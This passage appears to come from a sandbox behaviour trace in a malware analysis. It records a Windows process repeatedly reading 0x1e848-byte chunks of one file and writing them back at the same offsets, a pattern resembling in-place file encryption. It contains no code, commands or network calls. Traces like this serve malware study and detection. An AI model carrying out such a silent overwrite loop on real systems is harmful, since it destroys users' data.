lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.524] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77729d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.524] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.524] GetProcessHeap () returned 0x500000 [0122.524] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.525] GetProcessHeap () returned 0x500000 [0122.525] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.525] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77afa60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.525] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.534] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77afa60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.534] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.535] GetProcessHeap () returned 0x500000 [0122.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.535] GetProcessHeap () returned 0x500000 [0122.535] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.535] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77ecaf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.535] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.553] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77ecaf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.553] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.554] GetProcessHeap () returned 0x500000 [0122.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.554] GetProcessHeap () returned 0x500000 [0122.554] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.554] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7829b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.554] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.565] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7829b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.565] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.566] GetProcessHeap () returned 0x500000 [0122.566] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.566] GetProcessHeap () returned 0x500000 [0122.566] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.566] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7866c10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.566] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.577] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7866c10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.577] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.577] GetProcessHeap () returned 0x500000 [0122.577] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.577] GetProcessHeap () returned 0x500000 [0122.577] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.578] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x78a3ca0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.578] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.624] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x78a3ca0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.624] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.625] GetProcessHeap () returned 0x500000 [0122.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.625] GetProcessHeap () returned 0x500000 [0122.625] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.625] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x78e0d30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.625] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.648] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x78e0d30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.649] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.651] GetProcessHeap () returned 0x500000 [0122.651] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.652] GetProcessHeap () returned 0x500000 [0122.652] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.652] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x791ddc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.652] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.674] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x791ddc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.674] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.674] GetProcessHeap () returned 0x500000 [0122.675] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.675] GetProcessHeap () returned 0x500000 [0122.675] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.675] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x795ae50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.675] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.685] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x795ae50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.685] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.685] GetProcessHeap () returned 0x500000 [0122.685] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.686] GetProcessHeap () returned 0x500000 [0122.686] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.686] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7997ee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.686] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.697] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7997ee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.697] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.697] GetProcessHeap () returned 0x500000 [0122.698] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.698] GetProcessHeap () returned 0x500000 [0122.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.698] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x79d4f70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.698] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.715] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x79d4f70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.715] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.715] GetProcessHeap () returned 0x500000 [0122.715] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.715] GetProcessHeap () returned 0x500000 [0122.716] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.716] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a12000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.716] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.734] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a12000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.734] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.735] GetProcessHeap () returned 0x500000 [0122.735] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.735] GetProcessHeap () returned 0x500000 [0122.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.735] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a4f090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.735] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.767] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a4f090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.768] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.768] GetProcessHeap () returned 0x500000 [0122.768] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.768] GetProcessHeap () returned 0x500000 [0122.768] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.768] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a8c120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.768] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.779] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7a8c120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.779] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.780] GetProcessHeap () returned 0x500000 [0122.780] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.780] GetProcessHeap () returned 0x500000 [0122.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.780] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7ac91b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.780] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.791] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7ac91b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.791] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.792] GetProcessHeap () returned 0x500000 [0122.792] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.792] GetProcessHeap () returned 0x500000 [0122.792] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.792] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b06240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.792] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.880] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b06240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.880] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.881] GetProcessHeap () returned 0x500000 [0122.881] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.881] GetProcessHeap () returned 0x500000 [0122.881] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.881] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b432d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.881] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.892] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b432d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.893] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.893] GetProcessHeap () returned 0x500000 [0122.893] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.893] GetProcessHeap () returned 0x500000 [0122.893] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.893] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b80360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.894] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.938] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7b80360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.939] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.939] GetProcessHeap () returned 0x500000 [0122.939] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.939] GetProcessHeap () returned 0x500000 [0122.939] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.939] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7bbd3f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.940] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.952] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7bbd3f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.952] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.952] GetProcessHeap () returned 0x500000 [0122.952] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.952] GetProcessHeap () returned 0x500000 [0122.952] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.952] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7bfa480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.953] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.976] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7bfa480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.976] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.978] GetProcessHeap () returned 0x500000 [0122.978] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.978] GetProcessHeap () returned 0x500000 [0122.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.978] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7c37510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.978] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.003] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7c37510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.003] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.003] GetProcessHeap () returned 0x500000 [0123.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.003] GetProcessHeap () returned 0x500000 [0123.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.003] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7c745a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.004] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.014] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7c745a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.014] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.015] GetProcessHeap () returned 0x500000 [0123.015] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.015] GetProcessHeap () returned 0x500000 [0123.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.015] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7cb1630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.015] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.026] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7cb1630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.026] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.061] GetProcessHeap () returned 0x500000 [0123.061] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.061] GetProcessHeap () returned 0x500000 [0123.061] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.061] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7cee6c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.061] ReadFile (in: hFile=0x220, 